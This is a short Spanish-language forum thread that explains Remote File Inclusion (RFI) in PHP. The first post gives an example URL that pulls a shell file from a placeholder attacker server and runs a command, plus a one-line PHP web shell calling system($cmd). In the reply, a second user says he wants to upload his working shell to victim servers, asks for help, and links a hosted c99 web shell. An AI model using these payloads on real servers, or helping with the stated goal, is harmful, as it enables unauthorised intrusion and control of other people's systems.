eAprende.com

[fabian]

RFI (Remote File Inclusion), traducido al español como Inclusión Remota de Archivos - vulnerabilidad existente solamente en páginas dinámicas en PHP que permite el enlace de archivos remotos situados en otros servidores a causa de una mala programación de la página que contiene la función include().

Este tipo de vulnerabilidad no se da en páginas programadas en ASP o en cualquier otro tipo de lenguaje similar que no contenga la posibilidad de la inclusión remota de archivos ajenos al servidor.

Las funciones include, include_once, require, require_once son utilizadas para incluir en una misma página otras páginas a la vez, por la necesidad de utilizar un código fuente o por otras diversas razones de programación.

Una página vulnerable que presente un aspecto similar a este en su URL:

http://[servidor_victima]/index.php?page=plantilla.html

El atacante podrá obtener una Shell en el servidor vulnerable mediante lo siguiente:

http://[servidor_victima]/index.php?page=http://[servidor_atacante]/shell.txt&&cmd=ls

Pudiendo contener el archivo shell.txt cualquier código, por ejemplo:

<?
system($cmd);
?>

Seguir en la fuente http://es.wikipedia.org/wiki/Remote_Fil ... _%28RFI%29

PD: Este tipo de vulnerabilidades son fáciles de solucionar pero que muchos programadores no se dan cuenta o no dan importancia.

[jpelozo]

buen dato flaco.. justamente tengo una shell que funciona super bien.. ahora solo me resta ver somo subir en los server victimas.. aver si le amigo netsoul nos da una mano.. aqui dejo adjunto una shell http://www.cfsm.cn/c99.txt